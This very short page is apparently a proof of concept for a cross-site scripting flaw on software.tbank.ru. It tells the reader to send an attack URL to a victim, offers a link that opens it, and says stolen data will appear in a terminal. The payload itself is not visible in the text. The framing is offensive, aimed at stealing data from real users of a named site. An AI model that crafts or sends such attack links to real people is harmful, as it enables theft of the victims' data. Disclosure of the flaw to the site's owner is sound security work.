PoC: software.tbank.ru XSS

Attack URL (send to victim):

Open attack URL in new tab

Stolen data will appear in terminal.